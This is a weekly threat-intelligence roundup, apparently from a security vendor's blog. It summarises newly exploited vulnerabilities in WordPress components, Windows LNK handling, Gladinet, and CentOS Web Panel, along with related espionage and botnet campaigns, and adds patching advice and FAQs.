This week’s cybersecurity landscape reflected a surge in active exploitation and state-sponsored operations across multiple sectors. CISA added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog one impacting Gladinet CentreStack and Triofox, and another affecting CWP Control Web Panel highlighting continued risk from unpatched systems. Widespread exploitation was also observed in Microsoft Windows, JobMonster WordPress theme, and the Post SMTP WordPress plugin.  

Botnet operators such as EnemyBot, Sysrv-k, Andoryu, and Andorxgh0st expanded campaigns targeting exposed GitLab services, cloud gateways, and PHP-based applications, while IoT botnets like Mirai, Bashlite, Tsunami, and BricketBot focused on compromising EirD1000 routers for persistence and lateral movement.  

On the malware front, Arctic Wolf report China-Linked UNC6384 (Mustang Panda) exploiting a Microsoft vulnerability to deploy the PlugX RAT, and Sophos confirmed the Tick cyber espionage group's abuse of a Motex Lanscope Endpoint Management flaw to infiltrate Japanese networks.

Key points

• 2 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  
• 3 additional vulnerabilities were confirmed as actively exploited in the wild during the week.  
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-5397 - Authentication Bypass Vulnerability in JobMonster WordPress theme
‍An Authentication Bypass Vulnerability in the JobMonster - Job Board WordPress Theme, affecting versions up to and including 4.8.1, allowed unauthenticated attackers to bypass standard authentication and gain administrative access. According to Wordfence, the flaw originated from a weakness in the theme's custom login functionality, specifically when social login features were enabled, where the check_login() function failed to properly verify user identity before granting access. This vulnerability, impacting over 5.6k customers, was already under active exploitation, with more than 1,640 attack attempts blocked within a 24-hour period. Successful exploitation allowed threat actors to obtain administrative privileges, alter site content, steal employer and candidate data, deploy backdoors, and use compromised servers for further malicious activity. The issue has been patched in JobMonster version 4.8.2, and users are urged to update immediately to mitigate the risk.

CVE-2025-9491 - Remote Code Execution Vulnerability in the Microsoft Windows
A Remote Code Execution vulnerability in Microsoft Windows LNK File UI Misrepresentation allows remote attackers to execute arbitrary code via crafted .LNK files. The flaw, disclosed by Trend Micro’s Zero Day Initiative, arises from improper handling of .LNK files, enabling malicious content to be disguised and executed upon user interaction. UNC6384, a China-linked threat actor associated with Mustang Panda, exploited this flaw using decoy PDFs and a three-stage DLL side-loading chain to deploy PlugX malware entirely in memory. The group also used invisible HTA files loading external JavaScript from CloudFront to retrieve payloads, demonstrating a stealthy multi-stage attack chain. Despite active exploitation and the availability of a public proof-of-concept, Microsoft has not released a patch, stating that it does not consider this issue a vulnerability.

CVE-2025-11371 - Files or Directories Accessible to External Parties Vulnerability in Gladinet CentreStack and Triofox
A Files or Directories Accessible to External Parties vulnerability in Gladinet CentreStack and Triofox allowed attackers to disclose arbitrary system files on default installations up to and including version 16.7.10368.56560. Huntress reported active exploitation on September 26 - 27, 2025, where threat actors read Web.config to extract the machineKey and chained that disclosure with a prior ViewState deserialization flaw (CVE-2025-30406) to achieve remote code execution. Post-exploitation activity included base64-encoded payloads running as child processes of web servers, and three customer environments were confirmed compromised. No official patch was available at the time of reporting; Huntress recommended immediately disabling the “temp” handler in the UploadDownloadProxy Web.config at C:\Program Files (x86)\Gladinet Cloud Enterprise\UploadDownloadProxy\Web.config as a mitigation. A public proof-of-concept exists and the issue has been added to the CISA Known Exploited Vulnerabilities catalog.

CVE-2025-11833 - Missing Authorization Vulnerability in the Post SMTP WordPress Plugin
A Missing Authorization vulnerability in the Post SMTP WordPress plugin allowed unauthenticated attackers to read logged emails and perform account takeovers, impacting versions up to 3.6.0 before being patched in 3.6.1. Wordfence received the report from researcher “netranger” on October 11, 2025, verified it on October 15, and the vendor released a fix on October 29. The flaw stemmed from missing capability checks in the PostmanEmailLogs _construct routine, which exposed sensitive emails, including password reset links. Exploitation began on November 1, with Wordfence blocking over 4,500 attacks and warning that over 210,000 sites remained unpatched. The issue has since been resolved with the latest update, emphasizing the importance of timely patching.

CVE-2025-48703 - An OS Command Injection Vulnerability in the CWP Control Web Panel
An OS Command Injection Vulnerability in the CentOS Web Panel (CWP) allowed unauthenticated remote code execution by injecting shell metacharacters into the t_total parameter of a filemanager&acc=changePerm request, affecting versions before 0.9.8.1205. Exploitation required knowledge or a guess of a valid non-root username and was triggered via a crafted HTTPS request that executed commands as the targeted local user, enabling web shells, persistence, lateral pivoting, or privilege escalation. Internet exposure was widespread Netlas.io enumerated roughly 150,000 potentially affected CWP instances (37,510 in the United States) and Shodan showed over 220,000 internet-facing hosts making opportunistic mass scanning highly likely; a public proof-of-concept was published. CWP released a fix in version 0.9.8.1205 in May 2025, the vulnerability was recently added to the CISA KEV catalog, and operators of CWP instances should immediately apply the update and hunt for indicators of compromise such as unexpected web shells and new user accounts.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.  

CVE-2025-9491
According to Arctic Wolf, China-linked threat actor UNC6384 (associated with Mustang Panda, also tracked as Basin, Bronze President, Earth Preta, Red Delta, Temp.Hex, and Twill Typhoon) has been exploiting CVE-2025-9491 since September 2025 to deliver the PlugX remote access trojan through spear-phishing campaigns targeting European diplomatic personnel. The campaigns used malicious URLs to trigger infection chains affecting diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government aviation departments. Earlier, the Zero Day Initiative (ZDI) had disclosed the Windows .LNK file vulnerability in March 2025, warning that 11 APT groups, including Evil Corp, APT43, Bitter, APT37, Mustang Panda, and others from North Korea, Russia, China, and Iran were already exploiting it across multiple critical sectors. HarfangLab also reported that XDSpy abused the same flaw to deploy the Go-based XDigo malware against Eastern European government entities, reinforcing that the vulnerability continues to attract sustained exploitation by state-sponsored actors.

CVE-2025-61932
According to Sophos, a cyber espionage group known as Tick (aka Bronze Butler, Daserf, REDBALDKNIGHT, Stalker Panda, Stalker Taurus, and Swirl Typhoon) exploited this vulnerability in Motex Lanscope Endpoint Manager to achieve remote SYSTEM-level command execution with JPCERT/CC confirming active abuse to drop backdoors. Sophos observed attack chains delivering a Gokcpdoor backdoor in two variants server and client using DLL side-loading via an OAED Loader, and noted that the 2025 Gokcpdoor variant removed KCP support in favor of smux-based multiplexed C2 communications. Japan and the wider East Asia region represented primary targets aligned with Tick’s intelligence objectives, Sophos assessed, and defenders were urged to upgrade Lanscope servers and review internet-facing instances to mitigate further compromise.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

Overall, this week highlighted an increasing momentum in real-world exploitation, with threat actors rapidly expanding their attack surface coverage through a mix of mass-scanning, opportunistic targeting, and advanced privilege-escalation techniques. Platforms such as Loginsoft Vulnerability Intelligence (LOVI) empower organizations to stay proactive by providing timely insights into exploits, tracking attacker behaviors, and facilitating swift responses to emerging threats in an ever-evolving cybersecurity landscape.

FAQs:

1) What is CentOS Web Panel (CWP)?

CentOS Web Panel (CWP) is a free web hosting control panel used to manage servers running CentOS, Rocky Linux, and AlmaLinux. It provides an interface for managing web servers, databases, email, DNS, and security settings. A paid Pro version offers additional security features, automation, and support.

2) What is CVE-2025-2783?

A) CVE-2025-2783 is a sandbox escape vulnerability in the Google Chromium Mojo on Windows that arises due to logic error, where an incorrect handle is assigned under certain unspecified conditions. The flaw, described as an instance of an "incorrect handle provided in unspecified circumstances," could allow attackers to escape Chrome’s security sandbox, potentially leading to remote code execution.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.  

4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?  

A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.

‍